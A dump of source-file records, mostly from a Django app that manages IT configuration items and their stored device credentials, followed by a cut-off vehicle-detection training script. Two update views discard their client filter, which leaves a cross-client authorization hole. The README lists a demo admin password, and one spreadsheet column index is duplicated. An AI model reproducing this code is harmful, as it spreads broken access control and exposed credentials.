admin.site.register(Circuit)\n" }, { "alpha_fraction": 0.6449860334396362, "alphanum_fraction": 0.6535016894340515, "avg_line_length": 28.74235725402832, "blob_id": "cff8147e7a97d1d84c8cc92986888909a2c7edc6", "content_id": "76a6f393e9070304b5d95a31c770dd1e18f2a526", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6811, "license_type": "no_license", "max_line_length": 96, "num_lines": 229, "path": "/cis/models.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from typing import Tuple, NewType\n\nfrom django.contrib import admin\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom fernet_fields import EncryptedCharField\n\nfrom accounts.models import User\n\n\nCIId = NewType('CIId', int)\n\n\nclass Company(models.Model):\n \"\"\"Model representing an abstract Company.\n\n Base for Client, ISP and Manufacturer\n \"\"\"\n\n name = models.CharField(max_length=50, unique=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n abstract = True\n ordering = ['name']\n\n\nclass Client(Company):\n \"\"\"Model representing a Client company\"\"\"\n\n search_fields = ('name',)\n\n def get_absolute_url(self):\n return reverse('cis:client_detail', args=(self.id,))\n\n def __str__(self):\n return self.name\n\n\nclass Place(models.Model):\n \"\"\"Model representing a location of a Client\"\"\"\n\n client = models.ForeignKey(Client, on_delete=models.CASCADE)\n name = models.CharField(max_length=50)\n description = models.CharField(max_length=255, blank=True, null=True)\n\n def __str__(self):\n return f\"{self.client} | {self.name}\"\n\n def get_absolute_url(self):\n return reverse('cis:place_update', args=(self.pk,))\n\n class Meta:\n constraints = [\n models.UniqueConstraint(\n fields=['client', 'name'],\n name='unique_client_place_name'\n )\n ]\n\n\nclass ISP(Company):\n \"\"\"Model representing a Internet Service Provider company\"\"\"\n\n\nclass Manufacturer(Company):\n \"\"\"Model representing a Manufacturer of a Configuration Item\"\"\"\n\n\nclass Circuit(models.Model):\n \"\"\"Model representing a Circuit of a ISP installed in a Place\"\"\"\n\n place = models.ForeignKey(Place, on_delete=models.CASCADE)\n isp = models.ForeignKey(ISP, on_delete=models.CASCADE)\n identifier = models.CharField(max_length=50)\n bandwidth = models.CharField(max_length=10)\n type = models.CharField(max_length=50)\n description = models.CharField(max_length=255, help_text=\"\")\n\n def __str__(self):\n return f\"{self.isp.name} | {self.identifier} | {self.bandwidth}\"\n\n\nclass Contract(models.Model):\n \"\"\"Model representing a Contract applied to a CI\"\"\"\n\n name = models.CharField(max_length=100, unique=True)\n begin = models.DateField()\n end = models.DateField()\n description = models.TextField()\n\n def __str__(self):\n return self.name\n\n\nclass ApplianceManager(models.Manager):\n def get_queryset(self):\n return super().get_queryset().select_related('manufacturer')\n\n\nclass Appliance(models.Model):\n \"\"\"Model representing a physical or virtual Appliance that compounds a Configuration Item\"\"\"\n\n # modify the initial queryset to join the Manufacturer\n objects = ApplianceManager()\n\n client = models.ForeignKey(Client, on_delete=models.CASCADE)\n serial_number = models.CharField(max_length=255, unique=True)\n manufacturer = models.ForeignKey(Manufacturer, on_delete=models.SET_NULL, null=True)\n model = models.CharField(max_length=100)\n virtual = models.BooleanField(default=False)\n\n def __str__(self):\n return f\"{self.manufacturer} | {self.model} | {self.serial_number}\"\n\n def get_absolute_url(self):\n return reverse('cis:appliance_update', args=(self.pk,))\n\n class Meta:\n ordering = ['serial_number']\n\n\nclass Credential(models.Model):\n \"\"\"Model representing access credentials of a Configuration Item\"\"\"\n\n credential_id = models.AutoField(primary_key=True)\n username = EncryptedCharField(max_length=50)\n password = EncryptedCharField(max_length=50)\n enable_password = EncryptedCharField(max_length=50)\n instructions = EncryptedCharField(max_length=255, blank=True, null=True)\n\n\nclass CIPack(models.Model):\n \"\"\"\n Model representing a pack of CIs.\n\n It is used to send CIs to production.\n \"\"\"\n\n responsible = models.ForeignKey('accounts.User', on_delete=models.SET_NULL, null=True)\n sent_at = models.DateTimeField(auto_now_add=True, blank=True, null=True)\n approved_by = models.ForeignKey(\n 'accounts.User',\n on_delete=models.SET_NULL,\n null=True,\n related_name='cipacks_approved',\n limit_choices_to={'is_superuser': True}\n )\n\n @property\n @admin.display(description='Approved (%)')\n def percentage_of_cis_approved(self) -> int:\n num_cis_approved = self.ci_set.filter(status=2).count()\n if not num_cis_approved:\n return 0\n return round((num_cis_approved / len(self)) * 100)\n\n def send_to_production(self, ci_pks: Tuple[CIId, ...]):\n cis = CI.objects.filter(pk__in=ci_pks)\n self.ci_set.set(cis)\n self.ci_set.update(status=1)\n\n def approve_all_cis(self):\n self.ci_set.update(status=2)\n\n def __len__(self):\n return self.ci_set.count()\n\n def __str__(self):\n local_date = timezone.localtime(self.sent_at)\n return f\"{self.responsible} {local_date.strftime('%Y-%m-%d %H:%M:%S')}\"\n\n\nclass CI(Credential):\n \"\"\"\n Model representing a Configuration Item.\n\n It is composed of a Setup and a Credential.\n https://docs.djangoproject.com/en/stable/topics/db/models/#multiple-inheritance\n \"\"\"\n\n IMPACT_OPTIONS = (\n (0, 'low'),\n (1, 'medium'),\n (2, 'high'),\n )\n STATUS_OPTIONS = (\n (0, 'created'),\n (1, 'sent'),\n (2, 'approved'),\n )\n client = models.ForeignKey(Client, on_delete=models.CASCADE)\n place = models.ForeignKey(Place, on_delete=models.CASCADE)\n appliances = models.ManyToManyField(Appliance)\n hostname = models.CharField(max_length=50)\n ip = models.GenericIPAddressField()\n description = models.CharField(max_length=255)\n deployed = models.BooleanField(default=False)\n business_impact = models.PositiveSmallIntegerField(\n choices=IMPACT_OPTIONS,\n default=0,\n validators=[MinValueValidator(0), MaxValueValidator(2)],\n )\n contract = models.ForeignKey(Contract, on_delete=models.SET_NULL, null=True)\n status = models.PositiveSmallIntegerField(\n choices=STATUS_OPTIONS,\n default=0,\n validators=[MinValueValidator(0), MaxValueValidator(2)],\n )\n pack = models.ForeignKey(CIPack, on_delete=models.SET_NULL, null=True)\n\n def __str__(self):\n return f\"{self.place} | {self.hostname} | {self.ip}\"\n\n def get_absolute_url(self):\n return reverse('cis:ci_detail', args=(self.pk,))\n\n class Meta:\n ordering = ['hostname']\n constraints = [\n models.UniqueConstraint(\n fields=['client', 'hostname', 'ip', 'description'],\n name='unique_client_hostname_ip_description'\n )\n ]\n" }, { "alpha_fraction": 0.6836050152778625, "alphanum_fraction": 0.6836050152778625, "avg_line_length": 53.894737243652344, "blob_id": "6cec6aaf593f7865a2cf83ae278502a6e5dfb5e2", "content_id": "025350997e0c990d677a719980dbb710fdf4e78b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 102, "num_lines": 19, "path": "/cis/urls.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\napp_name = 'cis'\n\nurlpatterns = [\n path('cis/<status>/', views.CIListView.as_view(), name='ci_list'),\n path('ci/create/', views.CICreateView.as_view(), name='ci_create'),\n path('ci/upload/', views.ci_upload, name='ci_upload'),\n path('ci/<int:pk>', views.CIDetailView.as_view(), name='ci_detail'),\n path('ci/pack/send/', views.send_ci_pack, name='ci_pack_send'),\n path('places/', views.manage_client_places, name='manage_client_places'),\n path('place/create/', views.PlaceCreateView.as_view(), name='place_create'),\n path('place/<int:pk>', views.PlaceUpdateView.as_view(), name='place_update'),\n path('manufacturer/<int:pk>', views.ManufacturerDetailView.as_view(), name='manufacturer_detail'),\n path('appliances/', views.ApplianceListView.as_view(), name='appliance_list'),\n path('appliance/create/', views.ApplianceCreateView.as_view(), name='appliance_create'),\n path('appliance/<int:pk>', views.ApplianceUpdateView.as_view(), name='appliance_update'),\n]\n" }, { "alpha_fraction": 0.6948391795158386, "alphanum_fraction": 0.7090501189231873, "avg_line_length": 19.890625, "blob_id": "f2945cae70c1773566147fe85c9c493fa24ea0c8", "content_id": "f82b38b36d21f848ccefd175a737282c4e40838c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1337, "license_type": "no_license", "max_line_length": 103, "num_lines": 64, "path": "/README.md", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "# Internalize\n\nThis project is an exercise to apply the concepts of the Django web\nframework and Python.\n\nThe purpose of the app is to ease the transit of configuration\nitem data between an IT managed services provider (MSP) and\nits clients.\n\n\n## Authors\n\n- [@diegovilela](https://www.github.com/diegovilela)\n\n\n## Demo\n\nYou can access it with the following credentials.\n\n| username | password | login page |\n| -------- | -------- | -----------|\n| admin | UnQt5uGgjErbwkN | [for admins][2]\n| [email protected] | UnQt5uGgjErbwkN | [for users][1]\n| [email protected] | UnQt5uGgjErbwkN | [for users][1]\n\n[1]: https://secure-forest-64714.herokuapp.com/cis/cis/0/\n[2]: https://secure-forest-64714.herokuapp.com/admin/\n\n\n## Features\n\n- Admin area\n- Bulk insertion of items\n- Bulk approval of items\n- Responsive\n\n\n## Running Tests\n\nTo run only unit tests:\n```bash\n python manage.py test --exclude-tag functional\n```\n\nTo also run functional tests (requires [geckodriver](https://github.com/mozilla/geckodriver/releases)):\n```bash\n python manage.py test\n```\n\n\n## Installation\n\n```bash\n git clone https://github.com/DiegoVilela/internalize.git\n cd internalize\n pipenv install && pipenv shell\n python manage.py migrate\n python manage.py loaddata all.json\n python manage.py runserver\n```\n\n## Feedback\n\nIf you have any feedback, please reach out to us at [email protected]\n" }, { "alpha_fraction": 0.6651480793952942, "alphanum_fraction": 0.6668564677238464, "avg_line_length": 33.60098648071289, "blob_id": "3218731f1a468f91b8818a5843b514829ec4ac3b", "content_id": "733f1ee8d6287ccc817fcd90043e60126fdd9048", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7024, "license_type": "no_license", "max_line_length": 100, "num_lines": 203, "path": "/cis/views.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.db import DatabaseError\nfrom django.shortcuts import render, redirect\nfrom django.utils.translation import ngettext\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.http import Http404\nfrom django.forms import inlineformset_factory\nfrom django.core.exceptions import PermissionDenied\n\nfrom .models import CI, Client, Place, Manufacturer, Appliance, CIPack\nfrom .forms import UploadCIsForm, CIForm, ApplianceForm, PlaceForm\nfrom .loader import CILoader\nfrom .mixins import UserApprovedMixin, AddClientMixin\n\n\ndef homepage(request):\n user = request.user\n if not user.is_anonymous and not user.is_approved:\n messages.warning(request, 'Your account needs to be approved. '\n 'Please contact you Account Manager.')\n return render(request, 'homepage.html')\n\n\nclass PlaceCreateView(UserApprovedMixin, SuccessMessageMixin, AddClientMixin, CreateView):\n model = Place\n fields = ('name', 'description')\n success_message = \"The place %(name)s was created successfully.\"\n\n\nclass PlaceUpdateView(UserApprovedMixin, SuccessMessageMixin, UpdateView):\n model = Place\n fields = ('name', 'description')\n success_message = \"The place %(name)s was updated successfully.\"\n\n def get_queryset(self):\n qs = Place.objects.select_related('client')\n if not self.request.user.is_superuser:\n qs.filter(client=self.request.user.client)\n return qs\n\n\n@login_required\ndef manage_client_places(request):\n if not request.user.is_approved: raise PermissionDenied()\n\n client = request.user.client\n select_client_form = None\n if request.user.is_superuser:\n select_client_form = PlaceForm()\n\n if request.method == 'GET':\n if request.user.is_superuser:\n if (client_id_selected := request.GET.get('client')):\n # At this point, a client was selected by a superuser\n select_client_form = PlaceForm(request.GET)\n client = Client.objects.get(pk=client_id_selected)\n\n PlaceInlineFormSet = inlineformset_factory(\n Client, Place, fields=('name', 'description'), extra=0)\n formset = PlaceInlineFormSet(instance=client)\n\n if request.method == 'POST':\n formset = PlaceInlineFormSet(request.POST, instance=client)\n if formset.is_valid():\n formset.save()\n messages.success(request, \"The places were updated successfully.\")\n return redirect('cis:manage_client_places')\n\n return render(request, 'cis/manage_client_places.html', {\n 'formset': formset,\n 'select_client_form': select_client_form,\n 'client': client,\n })\n\n\nclass CICreateView(UserApprovedMixin, SuccessMessageMixin, AddClientMixin, CreateView):\n model = CI\n form_class = CIForm\n success_message = \"The CI was created successfully.\"\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n # only places of the user.client will be shown in the form\n kwargs.update({'client': self.request.user.client })\n return kwargs\n\n\nclass CIListView(UserApprovedMixin, ListView):\n model = CI\n paginate_by = 10\n\n def get_queryset(self):\n qs = CI.objects.filter(\n status=self.kwargs['status'],\n place__client=self.request.user.client\n )\n if self.request.user.is_superuser:\n qs = CI.objects.filter(status=self.kwargs['status'])\n\n return qs\n\n\nclass CIDetailView(UserApprovedMixin, DetailView):\n model = CI\n queryset = CI.objects.select_related('place', 'contract')\n\n def get_object(self, **kwargs):\n object = super().get_object(**kwargs)\n if not self.request.user.is_superuser:\n if object.place.client != self.request.user.client:\n # user authenticated but unauthorized\n raise Http404\n # user authenticated and authorized\n return object\n\n\nclass ManufacturerDetailView(UserApprovedMixin, DetailView):\n model = Manufacturer\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n qs = Appliance.objects.filter(\n manufacturer=context['manufacturer'],\n client=self.request.user.client,\n )\n if self.request.user.is_superuser:\n qs = Appliance.objects.filter(manufacturer=context['manufacturer'])\n context['num_appliances'] = qs.count()\n\n return context\n\n\nclass ApplianceListView(UserApprovedMixin, ListView):\n model = Appliance\n paginate_by = 10\n\n def get_queryset(self):\n qs = Appliance.objects.filter(client=self.request.user.client)\n if self.request.user.is_superuser:\n qs = super().get_queryset()\n return qs\n\n\nclass ApplianceCreateView(UserApprovedMixin, SuccessMessageMixin, AddClientMixin, CreateView):\n model = Appliance\n form_class = ApplianceForm\n success_message = \"The appliance %(serial_number)s was created successfully.\"\n\n\nclass ApplianceUpdateView(UserApprovedMixin, SuccessMessageMixin, UpdateView):\n model = Appliance\n form_class = ApplianceForm\n success_message = \"The appliance was updated successfully.\"\n\n def get_queryset(self):\n qs = Appliance.objects.select_related('client', 'manufacturer')\n if not self.request.user.is_superuser:\n qs.filter(client=self.request.user.client)\n return qs\n\n@login_required\ndef ci_upload(request):\n if not request.user.is_approved: raise PermissionDenied()\n\n result = None\n form = UploadCIsForm()\n\n if request.method == 'POST':\n form = UploadCIsForm(request.POST, request.FILES)\n if form.is_valid():\n client = request.user.client\n result = CILoader(request.FILES['file'], client).save()\n\n return render(request, 'cis/ci_upload.html', {\n 'form': form,\n 'result': result\n })\n\n\n@login_required\ndef send_ci_pack(request):\n if not request.user.is_approved: raise PermissionDenied()\n\n if request.method == 'POST':\n try:\n pack = CIPack.objects.create(responsible=request.user)\n ci_pks = request.POST.getlist('cis_selected')\n if ci_pks:\n pack.send_to_production(ci_pks)\n messages.success(request, ngettext(\n 'The selected CI was sent to production successfully.',\n 'The selected CIs were sent to production successfully.',\n len(ci_pks)\n ))\n else:\n messages.error(request, 'Please select at least one item to be sent to production.')\n except DatabaseError:\n raise DatabaseError('There was an error during the sending of the CIs to production.')\n\n return redirect('cis:ci_list', status=0)\n" }, { "alpha_fraction": 0.5890411138534546, "alphanum_fraction": 0.6164383292198181, "avg_line_length": 17.25, "blob_id": "e716397b76b3dbfd582deb840b7fc5c13d1afb4b", "content_id": "e1c305d63062104565bf29975a1f26f60ba80a42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 146, "license_type": "no_license", "max_line_length": 39, "num_lines": 8, "path": "/templates/homepage.html", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "{% extends \"base_generic.html\" %}\n\n{% block title %}Homepage{% endblock %}\n\n{% block content %}\n<h1 class=\"h5 my-4\">Homepage</h1>\n\n{% endblock %}\n" }, { "alpha_fraction": 0.6267281174659729, "alphanum_fraction": 0.6336405277252197, "avg_line_length": 16.360000610351562, "blob_id": "dfda00c5873c2395ac9dfe837941e252926c6028", "content_id": "ca2ad59678e7a68389dd738e890e12dbf1026d97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 434, "license_type": "no_license", "max_line_length": 38, "num_lines": 25, "path": "/Pipfile", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "[[source]]\nurl = \"https://pypi.python.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\nopenpyxl = \"*\"\nDjango = \"*\"\ndjango-crispy-forms = \"*\"\ndjango-extensions = \"*\"\npsycopg2-binary = \"*\"\ndjango-allauth = \"*\"\ndjango-fernet-fields = \"*\"\ngunicorn = \"*\"\ndjango-heroku = \"*\"\nwhitenoise = \"*\"\ndjango-debug-toolbar = \"*\"\ndjango-permissions-policy = \"*\"\n\n[dev-packages]\nselenium = \"*\"\ncoverage = \"*\"\n\n[requires]\npython_version = \"3.8\"\n" }, { "alpha_fraction": 0.5667429566383362, "alphanum_fraction": 0.5667429566383362, "avg_line_length": 27.5, "blob_id": "09fedf43fab850e1760ffa18a61ba9bd345ef3f7", "content_id": "192bff18f01d269684edd1d54e8b8c9edf6f2efc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 94, "num_lines": 46, "path": "/accounts/admin.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.utils.translation import gettext, gettext_lazy as _\n\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom .models import User\n\n\[email protected](User)\nclass CustomUserAdmin(UserAdmin):\n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n list_select_related = ('client',)\n list_display = (\n 'username',\n 'email',\n 'client',\n 'is_superuser',\n 'is_staff',\n 'is_active',\n 'date_joined',\n 'last_login',\n 'is_approved',\n )\n list_filter = (\n 'last_login',\n 'is_superuser',\n 'is_staff',\n 'is_active',\n 'date_joined',\n 'client',\n )\n\n fieldsets = (\n (None, {'fields': ('username', 'password')}),\n (_('Client'), {'fields': ('client',)}),\n (_('Personal info'), {'fields': ('first_name', 'last_name', 'email')}),\n (_('Permissions'), {\n 'fields': ('is_active', 'is_staff', 'is_superuser', 'groups', 'user_permissions'),\n }),\n (_('Important dates'), {'fields': ('last_login', 'date_joined')}),\n )\n\n @admin.display(boolean=True, description='Approved')\n def is_approved(self, obj):\n return obj.is_approved\n" }, { "alpha_fraction": 0.7092198729515076, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 19.14285659790039, "blob_id": "17caa3de9c251e4287b06795202370a4b8aac626", "content_id": "581752324fb4fb62d5283478903ed1d3eadca564", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 705, "license_type": "no_license", "max_line_length": 71, "num_lines": 35, "path": "/cis/cis_mapping.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "\"\"\"\nField names and their column location (zero-indexed) on the spreadsheet\n\"\"\"\n\nCIS_SHEET = 'cis'\n# Fields in \"cis\" sheet\nHOSTNAME = 0\nIP = 1\nDESCRIPTION = 2\nDEPLOYED = 3\nBUSINESS_IMPACT = 4\n\n# Site fields in \"cis\" sheet\nPLACE = 5\nPLACE_DESCRIPTION = 6\n\n# Contract fields in \"cis\" sheet\nCONTRACT = 7\nCONTRACT_BEGIN = 8\nCONTRACT_END = 8\nCONTRACT_DESCRIPTION = 10\n\n# Credential fields in \"cis\" sheet\nCREDENTIAL_USERNAME = 11\nCREDENTIAL_PASSWORD = 12\nCREDENTIAL_ENABLE_PASSWORD = 13\nCREDENTIAL_INSTRUCTIONS = 14\n\n# Appliances fields in \"appliances\" sheet\nAPPLIANCES_SHEET = 'appliances'\nAPPLIANCE_HOSTNAME = 0\nAPPLIANCE_SERIAL_NUMBER = 1\nAPPLIANCE_MANUFACTURER = 2\nAPPLIANCE_MODEL = 3\nAPPLIANCE_VIRTUAL = 4\n" }, { "alpha_fraction": 0.6056187152862549, "alphanum_fraction": 0.6069054007530212, "avg_line_length": 38.51694869995117, "blob_id": "9c35ba623ed0396002f7bb5993be08094c3b8e01", "content_id": "46104bd6e009be449ba3273b8ab9791abdd5fcd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4663, "license_type": "no_license", "max_line_length": 92, "num_lines": 118, "path": "/cis/loader.py", "repo_name": "DiegoVilela/internalize", "src_encoding": "UTF-8", "text": "import logging\n\nfrom collections import namedtuple\nfrom openpyxl import load_workbook\nfrom django.db import IntegrityError, transaction\nfrom typing import Set\n\nfrom .models import Client, Place, CI, Appliance, Contract, Manufacturer\nfrom .cis_mapping import HOSTNAME, IP, DESCRIPTION, \\\n DEPLOYED, BUSINESS_IMPACT, PLACE, PLACE_DESCRIPTION, CONTRACT, \\\n CONTRACT_BEGIN, CONTRACT_END, CONTRACT_DESCRIPTION, CREDENTIAL_USERNAME, \\\n CREDENTIAL_PASSWORD, CREDENTIAL_ENABLE_PASSWORD, CREDENTIAL_INSTRUCTIONS, \\\n CIS_SHEET, APPLIANCES_SHEET, APPLIANCE_HOSTNAME, APPLIANCE_SERIAL_NUMBER, \\\n APPLIANCE_MANUFACTURER, APPLIANCE_MODEL, APPLIANCE_VIRTUAL\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CILoader:\n def __init__(self, file, client: Client):\n self._workbook = load_workbook(file, read_only=True, data_only=True)\n self.client = client\n self.places = {}\n self.contracts = {}\n self.manufacturers = {}\n self.cis = []\n self.errors = []\n\n def save(self):\n cis_sheet = self._workbook[CIS_SHEET]\n logger.info(f'The method save() of the class {self.__class__.__name__} was called.')\n\n Error = namedtuple('Error', ['exc', 'row'])\n for row in cis_sheet.iter_rows(min_row=2, values_only=True):\n try:\n with transaction.atomic():\n ci = self._create_ci(row)\n ci.appliances.set(self._get_ci_appliances(row[HOSTNAME]))\n self.cis.append(ci)\n logger.info(f'{ci} was added to self.cis')\n except IntegrityError as e:\n self.errors.append(Error(e, row))\n logger.error(f'{e} spreadsheet row: {row} was added to self.errors')\n return self\n\n def _create_ci(self, row: tuple) -> CI:\n return CI.objects.create(\n client=self.client,\n hostname=row[HOSTNAME],\n ip=row[IP],\n description=row[DESCRIPTION],\n deployed=bool(row[DEPLOYED]),\n business_impact=self._get_business_impact(row[BUSINESS_IMPACT]),\n place=self._get_place(row[PLACE], row[PLACE_DESCRIPTION]),\n contract=self._get_contract(row),\n username=row[CREDENTIAL_USERNAME],\n password=row[CREDENTIAL_PASSWORD],\n enable_password=row[CREDENTIAL_ENABLE_PASSWORD],\n instructions=row[CREDENTIAL_INSTRUCTIONS],\n )\n\n def _get_ci_appliances(self, hostname: str) -> Set[Appliance]:\n appliances = set()\n appliances_sheet = self._workbook[APPLIANCES_SHEET]\n for appl_row in appliances_sheet.iter_rows(min_row=2, values_only=True):\n if appl_row[APPLIANCE_HOSTNAME] == hostname:\n appliances.add(self._get_appliance(appl_row))\n return appliances\n\n def _get_place(self, name: str, description: str) -> Place:\n if name in self.places:\n return self.places[name]\n else:\n self.places[name] = Place.objects.get_or_create(\n name=name,\n description=description,\n client=self.client\n )[0]\n return self.places[name]\n\n def _get_contract(self, row: tuple) -> Contract:\n contract_name = row[CONTRACT]\n if contract_name in self.contracts:\n return self.contracts[contract_name]\n else:\n self.contracts[contract_name] = Contract.objects.get_or_create(\n description=row[CONTRACT_DESCRIPTION],\n name=contract_name,\n begin=row[CONTRACT_BEGIN],\n end=row[CONTRACT_END],\n )[0]\n return self.contracts[contract_name]\n\n def _get_appliance(self, row) -> Appliance:\n appliance = Appliance.objects.get_or_create(\n client=self.client,\n serial_number=row[APPLIANCE_SERIAL_NUMBER],\n manufacturer=self._get_manufacturer(row[APPLIANCE_MANUFACTURER]),\n model=row[APPLIANCE_MODEL],\n virtual=bool(str(row[APPLIANCE_VIRTUAL]).strip())\n )[0]\n return appliance\n\n def _get_manufacturer(self, name: str) -> Manufacturer:\n if name in self.manufacturers:\n return self.manufacturers[name]\n else:\n self.manufacturers[name] = Manufacturer.objects.get_or_create(\n name=name,\n )[0]\n return self.manufacturers[name]\n\n @staticmethod\n def _get_business_impact(business_impact: str) -> int:\n model_choices = dict(CI.IMPACT_OPTIONS).items()\n options = {value: key for key, value in model_choices}\n return options.get(business_impact.lower())\n" } ]
21
KyleGrier/self-driving
https://github.com/KyleGrier/self-driving
10cf9bd01b496961cd2e478bb9aa3fff935944cd
19abb3eaf3218068184173d5ca273c74ff0e3e72
997785f6905727526b1d6bb30660b88dd634f5ea
refs/heads/master
2021-01-16T00:09:28.183732
2018-04-21T22:27:11
2018-04-21T22:27:11
99,946,120
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6594318747520447, "alphanum_fraction": 0.6806991696357727, "avg_line_length": 33.84771728515625, "blob_id": "6a96222c7e4f9c9b120890ff51ab96dba4c595c6", "content_id": "dafeb594677efb70b23f0a4ba576b8aa995dd994", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6865, "license_type": "no_license", "max_line_length": 205, "num_lines": 197, "path": "/CarND-Vehicle-Detect/pipeline.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "from helper import *\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nimport matplotlib.gridspec as gridspec\nfrom skimage.feature import hog\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import GridSearchCV\nimport glob\nimport time\nfrom scipy.ndimage.measurements import label\n\norient = 11\npix_per_cell = 16\ncell_per_block = 2\ncspace = 'YUV'\nsig = \"_ori\"+ str(orient)+ \"_pix\" + str(pix_per_cell) + \"_cell_per_block\"\nclf = None\nscaler = None\ntest_image = \"test_images/test6.jpg\"\ntest_images = [\"test_images_png/test0.png\", \"test_images_png/test1.png\", \"test_images_png/test2.png\", \"test_images_png/test3.png\", \"test_images_png/test4.png\", \"test_images_png/test5.png\", \"messigray.png\"]\n\ndef saveFeatures(ori=orient, pix=pix_per_cell, cell=cell_per_block, cspace=cspace):\n\n\tstart = time.time()\n\n\tcars, notcars = getData()\n\tstart = time.time()\n\tcar_features = extract_features(cars, cspace=cspace,\n\t\t\t\torient = ori, pix_per_cell = pix, cell_per_block = cell)\n\tnotcar_features = extract_features(notcars, cspace=cspace,\n\t\t\t\torient = ori, pix_per_cell = pix, cell_per_block = cell)\n\tX = np.vstack((car_features, notcar_features)).astype(np.float64)\n\ty = np.hstack((np.ones(len(car_features)),\n\t\t\t\t\t\tnp.zeros(len(notcar_features))))\n\n\tsig = \"_ori\"+ str(ori)+ \"_pix\" + str(pix) + \"_cell_per_block\" + str(cell) + \"_cspace_\" + cspace\n\tnp.save(\"feats/X_data{}\".format(sig), X)\n\tnp.save(\"feats/y_data{}\".format(sig), y)\n\n\tend = time.time() - start\n\tprint(\"Saving the features took {} seconds\".format(round(end, 2)))\n\n\n\treturn\n\ndef loadData(ori=orient, pix=pix_per_cell, cell=cell_per_block, cspace=cspace):\n\tstart = time.time()\n\tsig = \"_ori\"+ str(ori)+ \"_pix\" + str(pix) + \"_cell_per_block\" + str(cell) + \"_cspace_\" + cspace\n\tX = np.load(\"feats/X_data{}.npy\".format(sig))\n\ty = np.load(\"feats/y_data{}.npy\".format(sig))\n\trand_state = np.random.randint(100)\n\tX_train, X_test, y_train, y_test = train_test_split(\n\t\tX, y, test_size=0.1, random_state= 1, stratify=y)\n\n\tend = time.time() - start\n\n\tprint(\"Loading the features took {} seconds\".format(round(end, 2)))\n\n\treturn X_train, X_test, y_train, y_test\n\ndef loadDataFull(ori=orient, pix=pix_per_cell, cell=cell_per_block, cspace=cspace):\n\tstart = time.time()\n\tsig = \"_ori\"+ str(ori)+ \"_pix\" + str(pix) + \"_cell_per_block\" + str(cell) + \"_cspace_\" + cspace\n\tX = np.load(\"feats/X_data{}.npy\".format(sig))\n\ty = np.load(\"feats/y_data{}.npy\".format(sig))\n\n\tend = time.time() - start\n\n\tprint(\"Loading the features took {} seconds\".format(round(end, 2)))\n\n\treturn X, y\n\ndef trainModel(X_train, X_test, y_train, y_test):\n\t# Fit a per-column scaler only on the training data\n\tX_scaler = StandardScaler().fit(X_train)\n\t# Apply the scaler to X_train and X_test\n\tX_train = X_scaler.transform(X_train)\n\tX_test = X_scaler.transform(X_test)\n\t# Use a linear SVC \n\tsvc = LinearSVC(C=0.001)\n\t#svc = SVC(C=10) # best 100 only hog\n\t# Check the training time for the SVC\n\tt=time.time()\n\tsvc.fit(X_train, y_train)\n\tpred = svc.predict(X_test)\n\tt2 = time.time()\n\n\tprint(round(t2-t, 2), 'Seconds to train SVC...')\n\tprint('Test Accuracy of SVC = ', round(svc.score(X_test, y_test), 4))\n\ttn, fp, fn, tp = confusion_matrix(y_test, pred).ravel()\n\tprint(\"Percent of False Positives = \", round(fp/len(X_test), 5))\n\tprint(\"Percent of False Negatives = \", round(fn/len(X_test), 5))\n\treturn svc, X_scaler\n\ndef trainModelFull(X, y):\n\t# Fit a per-column scaler only on the training data\n\tX_scaler = StandardScaler().fit(X)\n\t# Apply the scaler to X_train and X_test\n\tX = X_scaler.transform(X)\n\t# Use a linear SVC \n\tsvc = LinearSVC(C=0.001)\n\t#svc = SVC(C=10) # best 100 only hog\n\t# Check the training time for the SVC\n\tt=time.time()\n\tsvc.fit(X, y)\n\tt2 = time.time()\n\n\treturn svc, X_scaler\n\n\nif __name__ == 